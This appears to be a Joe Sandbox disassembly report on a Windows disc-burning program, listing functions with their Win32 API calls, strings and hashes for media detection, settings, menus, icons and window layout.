Error, xrefs: 00448CA1
C:\, xrefs: 0044891F

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Message$Send$Folderlstrlen$LocationMallocSpecial$DesktopFileInfo__wcsnicmp_memsetlstrcmp
String ID: An error occured when trying to register the directory monitor. As a result the FeyWriter explorer tree will not automatically syn$C:\$Error$g
API String ID: 1250582773-3162229725
Opcode ID: 89b021e719d2645b34ca1cb4a8cdda4c7236dbcefe9b5e970948d97485aa1335
Instruction ID: b40e52c4d326ddeeaecd71a0dc2d73a7afb99d4f95839ee31cb91658fb03ca27
Opcode Fuzzy Hash: 89b021e719d2645b34ca1cb4a8cdda4c7236dbcefe9b5e970948d97485aa1335
Instruction Fuzzy Hash: 19B15BB1604700AFE354DF65D885FABBBE8BB88704F00492EF649D7291DB74E805CB66

Function 0044C7E0 Relevance: 44.0, APIs: 22, Strings: 3, Instructions: 241windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0044C81B
SendMessageW.USER32(?,0000041C,?,?), ref: 0044C84B
SendMessageW.USER32(?,00000418,00000000,00000000), ref: 0044C85C
SendMessageW.USER32(?,0000052E,00000000,00000000), ref: 0044C872
CreatePopupMenu.USER32 ref: 0044C880
GetClientRect.USER32(?,?), ref: 0044C8A2
SendMessageW.USER32(?,00000417,00000000,?), ref: 0044C8F4
SendMessageW.USER32(?,0000041D,00000000,?), ref: 0044C922
GetMenuItemCount.USER32(?), ref: 0044C94B
AppendMenuW.USER32(?,00000800,00000000,00000000), ref: 0044C967
_memset.LIBCMT ref: 0044C999
_memset.LIBCMT ref: 0044C9A7
GetMenuItemInfoW.USER32 ref: 0044C9E5
AppendMenuW.USER32(?,00000000,?,?), ref: 0044CA08
GetMenuItemCount.USER32(?), ref: 0044CB1F
DestroyMenu.USER32(?), ref: 0044CB2E
MessageBeep.USER32(000000FF), ref: 0044CB36

Strings

,, xrefs: 0044C9C3
P, xrefs: 0044C810
, xrefs: 0044CA67

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Menu$Message$Send$Item_memset$AppendCount$BeepClientCreateDestroyInfoPopupRect
String ID: $,$P
API String ID: 23422806-2204626854
Opcode ID: 88edff8793e986d9dd403fe4e3d360a7f6d5854dfda49e6939505e9e4e90cecb
Instruction ID: e89399b75f3865f3e3edfc78982f733581d0082a5e873cdba0b0c88bbb8b2ec8
Opcode Fuzzy Hash: 88edff8793e986d9dd403fe4e3d360a7f6d5854dfda49e6939505e9e4e90cecb
Instruction Fuzzy Hash: EC916DB0509381AFE7A0CF65D985FABBBE4FBC8700F04492EF58997250E7749805CB56

Function 00447030 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 157windowlibraryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0044705E
SHGetFileInfoW.SHELL32(004C49AC,00000000,?,000002B4,00004101), ref: 00447082
SendMessageW.USER32(?,00001003,00000001,00000000), ref: 00447099
SHGetFileInfoW.SHELL32(004C49AC,00000000,?,000002B4,00004100), ref: 004470B1
SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004470C2
ImageList_Create.COMCTL32(00000010,00000010,00000020,00000004,00000005), ref: 004470CE
LoadLibraryW.KERNEL32(shell32.dll), ref: 004470DF
LoadImageW.USER32(00000000,00000004,00000001,00000010,00000010,00000020), ref: 004470F8
FreeLibrary.KERNEL32(00000000), ref: 004470FD
ImageList_ReplaceIcon.COMCTL32(?,000000FF,00000000), ref: 00447113
DestroyIcon.USER32(00000000), ref: 0044711C
LoadImageW.USER32(?,000000D5,00000001,00000010,00000010,00000020), ref: 00447131
ImageList_ReplaceIcon.COMCTL32(?,000000FF,00000000), ref: 00447141
DestroyIcon.USER32(?), ref: 00447148
LoadImageW.USER32(?,000000D4,00000001,00000010,00000010,00000020), ref: 0044715D
ImageList_ReplaceIcon.COMCTL32(?,000000FF,00000000), ref: 0044716D
DestroyIcon.USER32(?), ref: 00447174
LoadImageW.USER32(?,000000D3,00000001,00000010,00000010,00000020), ref: 00447189
ImageList_ReplaceIcon.COMCTL32(?,000000FF,00000000), ref: 00447199
DestroyIcon.USER32(?), ref: 004471A0
LoadImageW.USER32(?,000000D6,00000001,00000010,00000010,00000020), ref: 004471B5
ImageList_ReplaceIcon.COMCTL32(?,000000FF,00000000), ref: 004471C3
DestroyIcon.USER32(00000000), ref: 004471C6
SendMessageW.USER32(?,00001109,00000000,?), ref: 004471DD

Strings

shell32.dll, xrefs: 004470D4

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Image$Icon$List_Load$DestroyReplace$MessageSend$FileInfoLibrary$CreateFree_memset
String ID: shell32.dll
API String ID: 1070798896-3366042328
Opcode ID: 4792194401fab71c5aa9ffb4452c6f9587d852f7a7a7d6e48eeb7793e2b92db2
Instruction ID: 03a245867684ba5234bb1f5fb20a21e2fce821ef2d57624249de242135a386d1
Opcode Fuzzy Hash: 4792194401fab71c5aa9ffb4452c6f9587d852f7a7a7d6e48eeb7793e2b92db2
Instruction Fuzzy Hash: 464169713443047BF630EBA5DD86F6777A8EBCCB10F110919B3546B2D1C6F5B4448A29

Function 00466160 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

SHGetDesktopFolder.SHELL32(?), ref: 004661C3
SHGetSpecialFolderLocation.SHELL32(?,?,00000000), ref: 004661DB
ILCombine.SHELL32(?,?), ref: 004661F1

Strings

SysListView32, xrefs: 004664CE

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Folder$CombineDesktopLocationSpecial
String ID: SysListView32
API String ID: 1671872321-78025650
Opcode ID: 6902517860e3241e697f8920a9d14f933734ef70395dff421b326f72a3541618
Instruction ID: 6d04bb7344f618d1c23629089f6b4957de8cc05bd8e458893c2041e23416cb8d
Opcode Fuzzy Hash: 6902517860e3241e697f8920a9d14f933734ef70395dff421b326f72a3541618
Instruction Fuzzy Hash: AAD13971204701AFD754DF99DC94F6BB7B8AB88700F10461EFA46873A1EB74E805CB6A

Function 0046CED0 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 370windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0046CF2D
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0046CF3B
SendMessageW.USER32(?,00001009,00000000,00000000), ref: 0046CF5A
SendMessageW.USER32(?,00000401,00000082,00000000), ref: 0046CF6C
SendMessageW.USER32(?,00000401,00000083,00000000), ref: 0046CF7E
SendMessageW.USER32(?,00000401,00000084,00000000), ref: 0046CF90

Part of subcall function 00424200: GetCurrentProcess.KERNEL32(00000000,0000000D), ref: 00424236
Part of subcall function 00424200: FlushInstructionCache.KERNEL32(00000000), ref: 0042423D
Part of subcall function 00424200: CreateDialogParamW.USER32(?,000000D2,000000E9,Function_000166E0,?), ref: 0042426D

ShowWindow.USER32(?,00000005), ref: 0046CFBC

Part of subcall function 00474430: SetDlgItemTextW.USER32(?,000003FD,00000000), ref: 0047443E

mciSendCommandW.WINMM ref: 0046D02B
mciSendCommandW.WINMM(?,0000080D,00000400,?), ref: 0046D05E
mciSendCommandW.WINMM(?,00000804,00000000,00000000), ref: 0046D06E
mciSendCommandW.WINMM(?,00000814,00000100,?), ref: 0046D092
mciSendCommandW.WINMM(?,00000804,00000000,00000000), ref: 0046D0A2
DestroyWindow.USER32(?), ref: 0046D394
mciSendCommandW.WINMM(00000000,00000804,00000000,00000000), ref: 0046D3E8
mciSendCommandW.WINMM(?,00000804,00000000,00000000), ref: 0046D3FF
mciSendCommandW.WINMM(?,00000804,00000000,00000000), ref: 0046D411

Strings

%02d:%02d:%02d (%d), xrefs: 0046D2C8

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Send$Command$Message$Window$CacheCreateCurrentDestroyDialogFlushInstructionItemParamProcessShowText
String ID: %02d:%02d:%02d (%d)
API String ID: 2167398509-190129043
Opcode ID: 7e67dbd3f5f0da4869b7b2c13b252682c7c53e324b23dc11815caa0bd5562335
Instruction ID: 4df02183ca7f41fb1cb44603426bdd268326263535ebdd4ceccb29eb09996f85
Opcode Fuzzy Hash: 7e67dbd3f5f0da4869b7b2c13b252682c7c53e324b23dc11815caa0bd5562335
Instruction Fuzzy Hash: F9E143B1648340AFE364DF65CD81F9BB7E8BBC8704F50891EF6899B2C1E7B494048B56

Function 00464C20 Relevance: 42.3, APIs: 2, Strings: 22, Instructions: 258COMMON

Download Yara Rule

Strings

count, xrefs: 00464E66
CopyWarning, xrefs: 00464CC3
Smoke, xrefs: 00464D33
submenu, xrefs: 00464E42
RememberShell, xrefs: 00464CB3
FIFO, xrefs: 00464D63
ShellExtension, xrefs: 00464E27
FixateWarning, xrefs: 00464D13
AutoRunCheck, xrefs: 00464C83
Global, xrefs: 00464C6F
RawImageInfo, xrefs: 00464CD3
AutoCheckBus, xrefs: 00464C93
GraceTime, xrefs: 00464D53
NoDevWarning, xrefs: 00464D23
WriteSpeedWarning, xrefs: 00464CF3
Wizard, xrefs: 00464D43
TempPath, xrefs: 00464D78
Log, xrefs: 00464CA3
CodecWarning, xrefs: 00464D03
Item%i, xrefs: 00464EA3
icons, xrefs: 00464E55
CharSetWarning, xrefs: 00464CE3

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID:
String ID: AutoCheckBus$AutoRunCheck$CharSetWarning$CodecWarning$CopyWarning$FIFO$FixateWarning$Global$GraceTime$Item%i$Log$NoDevWarning$RawImageInfo$RememberShell$ShellExtension$Smoke$TempPath$Wizard$WriteSpeedWarning$count$icons$submenu
API String ID: 0-2733358707
Opcode ID: 1d055cda36f99275ab490e861af252004e29b2c7ba7c935578fa2099226d6f93
Instruction ID: 3592bdcf8c3857e9b6853c4202a69c537dc7d919fe8ce152f6afa1e92772027d
Opcode Fuzzy Hash: 1d055cda36f99275ab490e861af252004e29b2c7ba7c935578fa2099226d6f93
Instruction Fuzzy Hash: B991D275244700ABC654EB51D856FFFB3A9AFC4708F44891EF08A47281EF7CA909876B

Function 00424510 Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 215windowstringCOMMON

Download Yara Rule

APIs

IsDlgButtonChecked.USER32(?,00000469), ref: 00424531
IsDlgButtonChecked.USER32(?,00000489), ref: 00424548
IsDlgButtonChecked.USER32(?,000003F7), ref: 0042455E
IsDlgButtonChecked.USER32(?,000003F8), ref: 00424575
IsDlgButtonChecked.USER32(?,0000041C), ref: 0042458C
IsDlgButtonChecked.USER32(?,0000041D), ref: 004245A2
IsDlgButtonChecked.USER32(?,0000041E), ref: 004245B9
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004245E3
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004245F1

Part of subcall function 00424350: ShowWindow.USER32(?,00000005,?,AD5E0258), ref: 004243B8
Part of subcall function 00424350: GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,00000000), ref: 00424418
Part of subcall function 00424350: DestroyWindow.USER32(?), ref: 0042443B

MessageBoxW.USER32(?,Unable to get source drive media information. Can not continue.,00000000,00000010), ref: 00424615
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0042463B
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00424649
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0042465D
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0042466B
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0042467F
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0042468D
GetDlgItemTextW.USER32(?,00000419,00000020,00000020), ref: 004246A4
lstrcmpW.KERNEL32(?,00000000), ref: 004246C0
lstrcmpW.KERNEL32(?,00000000), ref: 004246E0

Strings

Unable to get source drive media information. Can not continue., xrefs: 0042460F

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Message$Send$ButtonChecked$Windowlstrcmp$DestroyDiskFreeItemShowSpaceText
String ID: Unable to get source drive media information. Can not continue.
API String ID: 2183948556-358989737
Opcode ID: 47ae2bca482ba092c2dbf7cdd3108a77451457d8cc7aee8da78814be3fe90202
Instruction ID: 811acfc516e3c90da0634d3eab34e6c4c3054c70782f1a73c87f7e383a91e578
Opcode Fuzzy Hash: 47ae2bca482ba092c2dbf7cdd3108a77451457d8cc7aee8da78814be3fe90202
Instruction Fuzzy Hash: 3661C6B6644340BFE210DB75AD82F5B3798AFD4B04F00492AF246DB2D1D6B9F404CB6A

Function 00438560 Relevance: 42.1, APIs: 5, Strings: 19, Instructions: 132stringCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(?,DVD-RW ,DVD-RAM,?,00000402,DVD-R,?,00000402,DVD-ROM,CD-RW,?,00000402,CD-R,?,00000402,CD-ROM), ref: 00438603
lstrcatW.KERNEL32(?,00000000), ref: 0043861C
lstrcpyW.KERNEL32(00000402,DVD-RW ,?,00000402,?), ref: 0043863F
lstrcatW.KERNEL32(?,00000000), ref: 00438658
SetDlgItemTextW.USER32(?,00000402,00000000), ref: 0043872D

Strings

DVD-R DL, xrefs: 00438671
CD-RW, xrefs: 004385BF
CD-R, xrefs: 004385AF
DVD+R, xrefs: 00438691
HD DVD-RAM, xrefs: 00438709
DVD+RW, xrefs: 0043867E
DVD-ROM, xrefs: 004385CC
DVD-RAM, xrefs: 004385EF
HD DVD-R, xrefs: 004386F9
DVD-R, xrefs: 004385DF
DVD+RW DL, xrefs: 004386A1
CD-ROM, xrefs: 0043859C
BD-R RRM, xrefs: 004386D2
BD-RE, xrefs: 004386E2
BD-ROM, xrefs: 004386BB
BD-R SRM, xrefs: 004386C8
DVD-RW , xrefs: 004385F9, 00438635
DVD+R DL, xrefs: 004386AB
HD DVD-ROM, xrefs: 004386EF

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: lstrcatlstrcpy$ItemText
String ID: BD-R RRM$BD-R SRM$BD-RE$BD-ROM$CD-R$CD-ROM$CD-RW$DVD+R$DVD+R DL$DVD+RW$DVD+RW DL$DVD-R$DVD-R DL$DVD-RAM$DVD-ROM$DVD-RW $HD DVD-R$HD DVD-RAM$HD DVD-ROM
API String ID: 921043197-4268561141
Opcode ID: 48f51b43eefa48a484566a4d41cab6dfb1d9244c07f5ffb7e2dea683911124b9
Instruction ID: a947513ac362c73bc65a944c7cfc51e924e640a05d496f77b6608313b636e65b
Opcode Fuzzy Hash: 48f51b43eefa48a484566a4d41cab6dfb1d9244c07f5ffb7e2dea683911124b9
Instruction Fuzzy Hash: A54171F9384301BAD2908B509E47F23B6A5A798F40F30D51FB396761C1DFB8A802975E

Function 004485C0 Relevance: 39.3, APIs: 26, Instructions: 267windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000001), ref: 004485E7
GetWindowLongW.USER32(?,000000F0), ref: 004485F5
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00448610

Part of subcall function 004481E0: MulDiv.KERNEL32(?,00002710,?), ref: 00448253

Part of subcall function 004483B0: MulDiv.KERNEL32(?,00002710,?), ref: 00448423

GetWindowLongW.USER32(?,000000F0), ref: 00448618
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0044862D
IsWindowVisible.USER32(?), ref: 0044864F
ShowWindow.USER32(?,00000005), ref: 0044865B
ShowWindow.USER32(?,00000000), ref: 00448662
IsWindowVisible.USER32 ref: 0044868D
ShowWindow.USER32(?,00000005,?,?,00000000), ref: 00448698
ShowWindow.USER32(?,00000000,?,?,00000000), ref: 004486A1
GetWindowRect.USER32(?,004EE92C), ref: 004486BE
SetWindowPos.USER32(?,00000000,00000226,000000DC,000001F4,00000190,00000000,?,?,00000000), ref: 00448706
GetWindowLongW.USER32(?,000000F0), ref: 0044871F
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0044873A
GetWindowLongW.USER32(?,000000F0), ref: 00448742
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00448757
IsWindowVisible.USER32(?), ref: 00448779
ShowWindow.USER32(?,00000005), ref: 0044878B
ShowWindow.USER32(?,00000000), ref: 00448792
IsWindowVisible.USER32(00000000), ref: 004487BD
ShowWindow.USER32(?,00000005,?,00000000), ref: 004487C8
ShowWindow.USER32(?,00000000,?,00000000), ref: 004487D1
ShowWindow.USER32(?,00000005,?,00000000), ref: 0044880A
GetClientRect.USER32(?,?), ref: 00448823
SetWindowPos.USER32(?,00000000,00000226,000000DC,00000320,00000258,00000000), ref: 004488CD

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Window$Show$Long$Visible$Rect$Client
String ID:
API String ID: 3560287529-0
Opcode ID: ef523cd45fc9d53d8ce339b6f73219e85dadb15034c2dcd1230d1ecc29e4cd2a
Instruction ID: e9fccf78f804a81867bdc25c7afa6e9953fa2303fc12562a2646bf9b2cab3833
Opcode Fuzzy Hash: ef523cd45fc9d53d8ce339b6f73219e85dadb15034c2dcd1230d1ecc29e4cd2a
Instruction Fuzzy Hash: 30916EB1300701ABD724DF79DD95E6BB3E9AB88700F104A2EA655877C1DF78F8008B98

Function 0046A170 Relevance: 38.8, APIs: 18, Strings: 4, Instructions: 281windowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0046A182
GetClientRect.USER32(?,?), ref: 0046A191
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000006), ref: 0046A1BC

Part of subcall function 00469F30: CreateWindowExW.USER32(?,STATIC,?,?,?,?,?,?,?,?,?,?), ref: 00469F7E

GetStockObject.GDI32(00000011), ref: 0046A225
SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 0046A235

Part of subcall function 0046DDA0: GetDC.USER32(?), ref: 0046DDAC
Part of subcall function 0046DDA0: GetStockObject.GDI32(00000011), ref: 0046DDB6
Part of subcall function 0046DDA0: SelectObject.GDI32(00000000,00000000), ref: 0046DDC4
Part of subcall function 0046DDA0: lstrlenW.KERNEL32(?,?,00000420), ref: 0046DDE9
Part of subcall function 0046DDA0: DrawTextW.USER32(00000000,?,00000000), ref: 0046DDF6
Part of subcall function 0046DDA0: SelectObject.GDI32(00000000,00000000), ref: 0046DDFE
Part of subcall function 0046DDA0: ReleaseDC.USER32(?,00000000), ref: 0046DE02

Part of subcall function 00469ED0: CreateWindowExW.USER32(?,COMBOBOX,?,?,?,?,?,?,?,?,?,?), ref: 00469F1E

GetStockObject.GDI32(00000011), ref: 0046A2A1
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 0046A2AB
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0046A2C5
SendMessageW.USER32(00000000,00000143,00000000,00000000), ref: 0046A2DF
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0046A2F9
SendMessageW.USER32(?,0000014E,?,00000000), ref: 0046A309
GetStockObject.GDI32(00000011), ref: 0046A36A
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 0046A374

Part of subcall function 0046DDA0: GetWindowRect.USER32(?,?), ref: 0046DE36
Part of subcall function 0046DDA0: ScreenToClient.USER32(?,?), ref: 0046DE48
Part of subcall function 0046DDA0: ScreenToClient.USER32(?,?), ref: 0046DE50
Part of subcall function 0046DDA0: MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0046DE75

GetStockObject.GDI32(00000011), ref: 0046A3F3
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 0046A3FD
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0046A417
SendMessageW.USER32(00000000,00000143,00000000,00000000), ref: 0046A431
SendMessageW.USER32(?,0000014E,?,00000000), ref: 0046A441

Strings

P, xrefs: 0046A3BC
P, xrefs: 0046A1E8
P, xrefs: 0046A331
P, xrefs: 0046A25B

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
